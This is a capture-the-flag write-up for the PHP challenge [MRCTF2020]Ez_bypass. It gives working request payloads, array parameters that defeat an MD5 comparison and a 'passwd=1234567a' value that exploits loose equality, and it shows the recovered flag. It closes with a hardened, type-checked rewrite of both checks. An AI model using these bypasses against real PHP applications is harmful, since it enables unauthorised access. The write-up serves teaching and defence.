BUUCTF WEB [MRCTF2020]Ez_bypass
-
Open the challenge environment. The page shows:
I put something in F12 for you
include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if(isset($_GET['gg'])&&isset($_GET['id'])) {
    $id=$_GET['id'];
    $gg=$_GET['gg'];
    if (md5($id) === md5($gg) && $id !== $gg) {
        echo 'You got the first step';
        if(isset($_POST['passwd'])) {
            $passwd=$_POST['passwd'];
            if (!is_numeric($passwd)) {
                if($passwd==1234567) {
                    echo 'Good Job!';
                    highlight_file('flag.php');
                    die('By Retr_0');
                }
                else {
                    echo "can you think twice??";
                }
            }
            else{
                echo 'You can not get it !';
            }
        }
        else{
            die('only one way to get the flag');
        }
    }
    else {
        echo "You are not a real hacker!";
    }
}
else{
    die('Please input first');
}
}Please input first
-
From this, the site's source code can be inferred to be:
include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if(isset($_GET['gg'])&&isset($_GET['id'])) {
    $id=$_GET['id'];
    $gg=$_GET['gg'];
    // First check: equal MD5 hashes, different values
    if (md5($id) === md5($gg) && $id !== $gg) {
        echo 'You got the first step';
        if(isset($_POST['passwd'])) {
            $passwd=$_POST['passwd'];
            // Second check: not numeric, yet loosely equal to 1234567
            if (!is_numeric($passwd)) {
                if($passwd==1234567) {
                    echo 'Good Job!';
                    highlight_file('flag.php');
                    die('By Retr_0');
                }
                else {
                    echo "can you think twice??";
                }
            }
            else{
                echo 'You can not get it !';
            }
        }
        else{
            die('only one way to get the flag');
        }
    }
    else {
        echo "You are not a real hacker!";
    }
}
else{
    die('Please input first');
}
-
First check
if (md5($id) === md5($gg) && $id !== $gg)
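This can be bypassed by submitting both parameters as arrays. On PHP versions before 8, md5() returns NULL (with a warning) when given an array, so the two hashes are strictly equal while the arrays themselves differ: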
?id[]=1&gg[]=2
Response:
Warning: md5() expects parameter 1 to be string, array given in /var/www/html/index.php on line 48
Warning: md5() expects parameter 1 to be string, array given in /var/www/html/index.php on line 48
You got the first steponly one way to get the flag
-
Second check
if (!is_numeric($passwd)) { if($passwd==1234567) {
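This is a PHP loose (weakly typed) comparison. The string 1234567a is not numeric, so it passes !is_numeric(), but on PHP versions before 8 the == operator converts it to the integer 1234567 before comparing. It is enough to submit, in the POST body: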
passwd=1234567a
Response:
Warning: md5() expects parameter 1 to be string, array given in /var/www/html/index.php on line 48
Warning: md5() expects parameter 1 to be string, array given in /var/www/html/index.php on line 48
You got the first stepGood Job! <?php $flag="flag{de31e5a6-2a6a-4c56-b55a-59e4f662af84}" ?> By Retr_0
-
Flag obtained:
flag{de31e5a6-2a6a-4c56-b55a-59e4f662af84}
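
The two checks rewritten with explicit type validation, as an added example that is not part of the original write-up or the challenge's code. The function names string_param, equals_int and same_md5_different_value are hypothetical, and the $get and $post arrays are constructed to mirror the two requests above.

```php
<?php
declare(strict_types=1);

/** Return a request parameter only if it is a plain string; id[]=1 style arrays yield null. */
function string_param(array $source, string $key): ?string
{
    $value = $source[$key] ?? null;
    return is_string($value) ? $value : null;
}

/** Type-checked form of the first check: both inputs must be strings before md5() is called. */
function same_md5_different_value(?string $a, ?string $b): bool
{
    if ($a === null || $b === null) {
        return false;
    }
    return $a !== $b && hash_equals(md5($a), md5($b));
}

/** Strict replacement for `$passwd == 1234567`: the whole string must parse as an integer. */
function equals_int(?string $value, int $expected): bool
{
    if ($value === null) {
        return false;
    }
    // FILTER_VALIDATE_INT rejects strings with trailing characters such as "1234567a".
    $parsed = filter_var($value, FILTER_VALIDATE_INT);
    return $parsed !== false && $parsed === $expected;
}

// Constructed inputs: what PHP builds for ?id[]=1&gg[]=2 and for passwd=1234567a.
$get  = ['id' => ['1'], 'gg' => ['2']];
$post = ['passwd' => '1234567a'];

// Array-valued parameters never reach md5().
var_dump(same_md5_different_value(string_param($get, 'id'), string_param($get, 'gg')));
// The write-up's passwd value, then an exact numeric string for comparison.
var_dump(equals_int(string_param($post, 'passwd'), 1234567));
var_dump(equals_int('1234567', 1234567));
```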